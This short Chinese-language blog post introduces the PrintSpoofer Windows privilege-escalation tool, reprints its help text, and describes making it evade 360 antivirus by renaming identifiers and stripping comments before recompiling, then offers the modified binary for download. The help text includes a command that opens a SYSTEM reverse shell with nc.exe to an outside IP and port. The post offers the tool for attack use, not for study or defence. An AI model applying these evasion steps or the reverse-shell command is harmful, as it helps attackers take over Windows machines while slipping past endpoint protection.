【原创】PrintSpoofer 免杀过360杀毒 360安全卫士

1.printspoofer介绍

printspoofer提权工具目前主流的提权工具之一

使用方法

C:\TOOLS>PrintSpoofer.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c Execute the command CMD
-i Interact with the new process in the current command prompt (default is non-interactive)
-d Spawn a new process on the desktop corresponding to this session ID (check your ID with qwinsta)
-h That’s me 🙂
Examples:
Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
Get a SYSTEM reverse shell
PrintSpoofer.exe -c “c:\Temp\nc.exe 10.10.13.37 1337 -e cmd”

源码下载

https://github.com/whojeff/PrintSpoofer

vs2019编译发现360全家桶查杀

2.免杀处理

printspoofer 将这个关键词替换成其他字符串 如 moonsec

PrintSpoofer.cpp PrintSpoofer.h 全部改为 moonsec

帮助注释全部处理掉

release x64 重新生成

3.最终效果

360安全卫士 360杀毒软件 均没拦截和查杀

免杀处理时间 2020年8月21日

4.下载

关注moon_sec公众号 回复 printspoofer 即可下载处理好的工具